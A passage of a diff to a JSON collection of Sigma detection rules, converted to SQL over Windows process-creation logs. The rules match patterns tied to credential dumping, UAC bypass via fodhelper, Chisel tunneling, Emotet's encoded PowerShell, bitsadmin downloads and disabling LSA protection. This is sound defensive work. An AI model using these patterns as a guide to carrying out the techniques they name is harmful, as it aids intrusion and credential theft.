"proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ 
- "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE 
'%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by 
raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": 
"experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation 
(CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot 
Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - 
"Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ 
@@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used 
in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted 
high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", 
- "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM 
